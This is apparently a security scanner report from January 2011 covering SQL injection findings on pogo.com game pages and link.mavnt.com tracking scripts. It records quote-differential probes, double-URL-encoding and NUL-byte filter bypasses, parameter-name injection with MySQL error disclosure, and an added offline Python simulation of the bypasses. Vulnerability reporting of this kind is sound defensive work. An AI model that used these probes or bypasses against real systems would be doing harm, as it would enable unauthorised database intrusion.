           
       </ul>
   

</div>





<div id="page-wrapper" class="clearfix">
   
       

















<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>






   
       
       
   











   
       <div id="catBelt">
           <ul id="catList" class="items10">
               
                   
                       
                   
                   
               
               
                   
                   

                   <li id="allgames" >
                       
                           

<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="puzzle" >
                       
                           
                           

<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="board"
...[SNIP]...

1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The ahst parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ahst parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ahst request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 37804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.html";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 37843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.6. http://game3.pogo.com/room/game/game.jsp [apid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The apid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:30 GMT
Server: Apache-Coyote/1.1
Content-Length: 37803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.html";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:30 GMT
Server: Apache-Coyote/1.1
Content-Length: 37849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.7. http://game3.pogo.com/room/game/game.jsp [rkey parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The rkey parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rkey parameter and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 1.6, both captured responses are redirects to the unauthenticated login page (Content-Length 37785 against 37813) and the only error signal is the tracked referrer /error/invalidurl.jsp in Response 1, a generic invalid-URL handler; here the quote was sent raw (rkey=...'), so no encoding bypass was involved. The finding remains unconfirmed.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357'&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:28 GMT
Server: Apache-Coyote/1.1
Content-Length: 37785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.jsp";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authentic
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357''&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:28 GMT
Server: Apache-Coyote/1.1
Content-Length: 37813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.8. http://game3.pogo.com/room/game/game.jsp [s_sess cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Two things in the captured exchange argue against this finding: s_sess, like the s_pers, s_sq and s_cc values beside it, is an Omniture/Adobe SiteCatalyst analytics cookie maintained by client-side JavaScript, so the server is unlikely to read it into a query at all; and the tracked referrer in Response 1, /error%2527/java-problem.jsp, carries the %2527 probe from an earlier request rather than this cookie's %00' payload, so the "error" the scanner keyed on looks like state left over from a previous probe.

The application attempts to block the plain single quote, but the block can be circumvented by submitting a URL-encoded NUL byte (%00) immediately before the blocked characters, as in the %3B%00' cookie value below.

Remediation detail

NUL byte bypasses typically arise when the filtering is done by a web application firewall written in native code, where a NUL byte terminates the string being inspected, so the quote after it is never examined, while the application runtime behind it (here a Java servlet container, per Server: Apache-Coyote/1.1) keeps the whole value. Fix the actual vulnerability in the application code and, if appropriate, ask the WAF vendor to provide a fix for the NUL byte bypass.
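The two bypasses recorded against game.jsp, double URL-encoding (1.6) and a leading NUL byte (1.8), and the advice about decoding order are easier to reason about with the pipeline written out. The Python below is an added example, not code from this report or from pogo.com: it models a web server that URL-decodes once, a hypothetical quote-rejecting filter in two flavours (one that sees the whole string, one modelled on native code that stops at the first NUL byte), and an application that may decode a second time. The stage and filter names are assumptions for illustration.

```python
"""Encoding bypasses from findings 1.6 (double URL-encoding) and 1.8 (NUL byte),
simulated offline. Added example; the filters are hypothetical stand-ins for
whatever blocked the plain quote in the report."""
from typing import Callable, Optional, Tuple
from urllib.parse import unquote


def probe_pair(base: str, encoding: str = "plain") -> Tuple[str, str]:
    """Return the (one quote, two quotes) pair used by the quote differential test.

    plain  -> base'       / base''
    double -> base%2527   / base%2527%2527   (finding 1.6)
    nul    -> base%00'    / base%00''        (finding 1.8)
    """
    if encoding == "plain":
        return base + "'", base + "''"
    if encoding == "double":
        return base + "%2527", base + "%2527%2527"
    if encoding == "nul":
        return base + "%00'", base + "%00''"
    raise ValueError(f"unknown encoding {encoding!r}")


def filter_textual(value: str) -> bool:
    """Filter that inspects the whole once-decoded string. True = allowed."""
    return "'" not in value


def filter_native(value: str) -> bool:
    """Filter modelled on native code working on NUL-terminated strings:
    everything after the first NUL byte is invisible to it (finding 1.8)."""
    return "'" not in value.split("\x00", 1)[0]


def value_seen_by_sql(raw: str, filt: Callable[[str], bool],
                      app_decodes_again: bool) -> Optional[str]:
    """Web server decodes once, the filter inspects the result, and the
    application may decode a second time. Returns the string that reaches
    the SQL layer, or None when the filter rejected the request."""
    once = unquote(raw)
    if not filt(once):
        return None
    return unquote(once) if app_decodes_again else once


def demo() -> dict:
    """The four cases the two findings describe, keyed by name."""
    dbl_one, _ = probe_pair("autoratedrules", "double")
    nul_one, _ = probe_pair("s_sq%3D%3B", "nul")
    return {
        # %2527 becomes %27 after one decode: harmless unless the app decodes again
        "double_single_decode": value_seen_by_sql(dbl_one, filter_textual, False),
        "double_double_decode": value_seen_by_sql(dbl_one, filter_textual, True),
        # a text-aware filter sees the quote after the NUL; a native one does not
        "nul_textual": value_seen_by_sql(nul_one, filter_textual, False),
        "nul_native": value_seen_by_sql(nul_one, filter_native, False),
    }


if __name__ == "__main__":
    for case, seen in demo().items():
        print(f"{case:22} -> {seen!r}")
```

Only the combination of a second decode (double_double_decode) or a NUL-blind filter (nul_native) delivers a bare quote to the query; with a single decode the %2527 probe arrives as the harmless text %27, which is the point of the remediation advice above.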

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00'; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 37770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error%2527/java-problem.jsp";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00''; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 38106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.9. http://link.mavnt.com/1x1.php [51270 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1.php

Issue detail

The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the evidence is strong: Response 1 is a MySQL syntax error whose quoted fragment '51270'' shows the submitted text wrapped in a string literal, and the uncaught DBException also discloses the absolute path and line of the database class (/var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204). Note that the request carries no parameter value at all (1x1.php?51270'), so the text reaching the query is the parameter name; with '' the application returns its normal 49-byte tracking GIF.

The database appears to be MySQL.

Remediation detail

Suppressing the error text removes the oracle but not the injection. Build the statement with bound parameters (or check the value against an allow-list if it must be used as an identifier), return the tracking pixel even when the lookup fails, and log the full exception, including the path now disclosed in the response, server-side only.

Request 1

GET /1x1.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The parameter name, not its value, is the injection point: 1x1.php?1'=1 (name 1', value 1) produces the MySQL error and 1x1.php?1''=1 does not, so the application is embedding request parameter names (or the raw query string) in its SQL. Validation applied to parameter values will not reach this input, and it explains 1.9, whose request had no value either.

The database appears to be MySQL.

Remediation detail

Suppress SQL error text in responses, but fix the query itself: the application must stop feeding raw query-string keys into SQL and instead read the specific parameters it needs and bind their values as parameters.

Request 1

GET /1x1.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0 /var/d
...[SNIP]...

Request 2

GET /1x1.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.11. http://link.mavnt.com/1x1_map.php [51270 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1_map.php

Issue detail

The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The behaviour is identical to 1x1.php in 1.9: the same MySQL error, the same fragment '51270'' and the same disclosed class path, so both scripts share the database code at AdventDBMySQL.class.php line 204, and again the injected text is a parameter name because the request supplies no value.

The database appears to be MySQL.

Remediation detail

Suppress SQL error text in responses, but the real fix is the query: bind the value as a parameter instead of concatenating it, keep the tracking pixel as the only response to a failed lookup, and fix the shared database class once so that both 1x1.php and 1x1_map.php are covered.

Request 1

GET /1x1_map.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1_map.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
